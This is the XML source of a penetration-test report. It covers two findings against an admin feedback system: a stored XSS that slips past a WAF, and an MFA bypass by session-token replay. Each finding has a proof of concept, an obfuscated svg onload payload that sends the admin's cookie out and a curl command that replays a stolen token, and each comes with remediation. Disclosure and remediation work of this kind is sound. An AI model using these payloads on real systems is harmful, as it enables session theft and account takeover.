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EE85" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Technical Findings Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C05516" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Target: Admin Feedback System (feedback.admin.local)  |  Assessor: Vincent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8CEEB4" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>Stored Cross-Site Scripting (XSS) via WAF Filter Bypass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4E5E" w14:paraId="24D6E479" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28AE54B2" w14:textId="2B522AEA" w:rsidR="00724E5E" w:rsidRPr="00F21B3F" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F21B3F">
              <w:t xml:space="preserve">CVSS </w:t>
            </w:r>
            <w:r w:rsidR="00F21B3F">
              <w:t xml:space="preserve">4.0 </w:t>
            </w:r>
            <w:r w:rsidRPr="00F21B3F">
              <w:t>Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6960" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42F3FA52" w14:textId="280804CC" w:rsidR="00724E5E" w:rsidRPr="001B0176" w:rsidRDefault="00F21B3F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B0176">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>8.2 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00724E5E" w14:paraId="0AB51151" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6307B0C6" w14:textId="5AC5A06F" w:rsidR="00724E5E" w:rsidRPr="00F21B3F" w:rsidRDefault="00F21B3F">
            <w:r w:rsidRPr="00F21B3F">
              <w:t>CVSS:4.0</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00000000" w:rsidRPr="00F21B3F">
              <w:t>Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6960" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39158C53" w14:textId="5AB68D98" w:rsidR="00724E5E" w:rsidRPr="00F21B3F" w:rsidRDefault="00F21B3F">
            <w:r w:rsidRPr="00F21B3F">
              <w:t>AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00724E5E" w14:paraId="3B78F199" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F65F6A3" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRPr="00F21B3F" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F21B3F">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6960" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65B3BD7A" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00724E5E"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00724E5E" w14:paraId="352C38F7" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29D95339" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRPr="00F21B3F" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F21B3F">
              <w:t>Security Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6960" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="115A86FB" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000" w:rsidP="00F21B3F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Theft of an authenticated administrator’s session cookie</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58F8F36B" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000" w:rsidP="00F21B3F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Unauthorized administrative access via a hijacked session</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="619F3E77" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000" w:rsidP="00F21B3F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Client-side content tampering / manipulation in the victim’s browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00724E5E" w14:paraId="06B47F75" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C923E7C" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRPr="00F21B3F" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F21B3F">
              <w:t>Affected API &amp; Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6960" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11740453" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000" w:rsidP="00F21B3F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>POST /api/feedback (injection point)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AD69F92" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000" w:rsidP="00F21B3F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>GET /admin/review (execution point)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="558A4FB1" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00724E5E">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36202F3D" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC10D42" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>The feedback submission endpoint (POST /api/feedback) is filtered by a keyword-based Web Application Firewall that blocks the literal string "&lt;script". This is a blocklist, not a sanitizer — payloads using other elements with event handlers (e.g. &lt;svg onload=...&gt;) are stored and later rendered without output encoding on /admin/review, an admin-only page. When an authenticated administrator views that page, the attacker’s JavaScript executes in the admin’s browser session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08264524" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F373757" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="100" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>&lt;svg onload="fetch('/collect?c='+window['docu'+'ment']['coo'+'kie'])"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4452E676" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>Submitted via the public feedback form, this payload passes the WAF, is stored, and fires when an admin loads /admin/review, sending the admin’s own session cookie to an attacker-controlled endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B601F40" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Business Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719BA0AE" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>An unauthenticated, external party can compromise an administrator’s active session with a single stored payload and no interaction beyond the admin’s normal use of the review page. Because the resulting cookie is not HttpOnly, the theft is trivial once the script executes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A702985" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF5CC54" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Replace the keyword blocklist with context-aware output encoding (HTML-entity encode all user-supplied content before rendering).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAC737A" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Apply a strict Content-Security-Policy (script-src 'self'; no unsafe-inline) to prevent inline event handlers from executing at all, regardless of what the WAF catches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D6FBAA" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Treat WAFs as a supplementary control, not a substitute for proper output encoding at the point of rendering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53819B9F" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3C0E23" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Broken Authentication: MFA Bypass via Session Token Replay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4B08" w14:paraId="0960CA0F" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50F7135B" w14:textId="785AC8E7" w:rsidR="006B4B08" w:rsidRPr="00F21B3F" w:rsidRDefault="006B4B08" w:rsidP="006B4B08">
            <w:r w:rsidRPr="00F21B3F">
              <w:t xml:space="preserve">CVSS </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">4.0 </w:t>
            </w:r>
            <w:r w:rsidRPr="00F21B3F">
              <w:t>Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6960" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31AE5E34" w14:textId="65DE4E04" w:rsidR="006B4B08" w:rsidRPr="001B0176" w:rsidRDefault="001B0176" w:rsidP="006B4B08">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B0176">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9.3 (Critical)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B4B08" w14:paraId="61E5776D" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61345AC5" w14:textId="4AD1F8CC" w:rsidR="006B4B08" w:rsidRPr="00F21B3F" w:rsidRDefault="006B4B08" w:rsidP="006B4B08">
            <w:r w:rsidRPr="00F21B3F">
              <w:t>CVSS:4.0</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F21B3F">
              <w:t>Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6960" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="308B0FAF" w14:textId="574ACE48" w:rsidR="006B4B08" w:rsidRPr="00F21B3F" w:rsidRDefault="006B4B08" w:rsidP="006B4B08">
            <w:r w:rsidRPr="006B4B08">
              <w:t>AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00724E5E" w14:paraId="31143586" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A636F70" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRPr="00F21B3F" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F21B3F">
              <w:t>Security Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6960" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43B6F7D9" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Complete bypass of the Multi-Factor Authentication control</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D4F29B4" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Unauthorized administrative access with no valid credentials</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40FFD17B" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Full read/write access to administrative functionality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00724E5E" w14:paraId="571FCAF7" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F562759" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRPr="00F21B3F" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F21B3F">
              <w:t>Affected API &amp; Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6960" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57308115" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>GET /dashboard (access granted without re-verification)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AD4F74A" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>POST /api/verify-mfa (silently bypassed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79BA53F2" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00724E5E">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C337288" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBDC2EA" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>/dashboard grants access to any request bearing a known adm_sess token. The backend never re-verifies that /api/verify-mfa was actually completed for the request presenting the cookie, and the token carries no binding to the original client (no IP pinning, device fingerprint, or short-lived freshness window tied to the MFA event). As a result, the token alone — however it was obtained — is functionally equivalent to a full, MFA-verified login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EB806B" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Scored assuming the attacker already holds a valid adm_sess token, obtained via the Stored XSS finding above — the realistic precondition demonstrated in this engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AA7AE9" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3A282A" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="100" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>curl -i --cookie "adm_sess=&lt;stolen_token&gt;" http://&lt;host&gt;:3075/dashboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1823C633" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="100" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t># 200 OK - full dashboard access, /api/verify-mfa was never called</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F775E95" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Business Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11743B9F" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>This is the finding that turns "a stolen cookie" into "a bypassed MFA control." MFA is only as strong as the binding between the verified factor and the session it protects; here, that binding doesn’t exist. Any means of obtaining the token — XSS, network capture, a leaked log line, a shoulder-surfed dev-tools session — is sufficient for full compromise, and MFA provides no additional protection once a token is out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331FECCC" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACC2420" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Bind sessions to the specific authentication event: regenerate the session token immediately after successful MFA verification, and reject any token not issued through that path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3492CD8C" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Add session-binding signals (IP address consistency, user-agent consistency, or a short server-side freshness window) and re-prompt for MFA when they don’t match.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE43950" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Apply a short idle/absolute timeout to authenticated sessions and support server-side session revocation so a stolen token has a limited useful lifetime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1477C0E1" w14:textId="77777777" w:rsidR="00724E5E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Log and alert on session use from a new IP/user-agent combination that wasn’t present at MFA verification time.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00724E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5542B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4CA6F81E"/>
    <w:lvl w:ilvl="0" w:tplc="2A7A0374">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="CCB01E40">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="02280EC4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C06A380E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="FD3453E4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B992B5FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="7B029B64">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="BD60A126">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="9786612C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
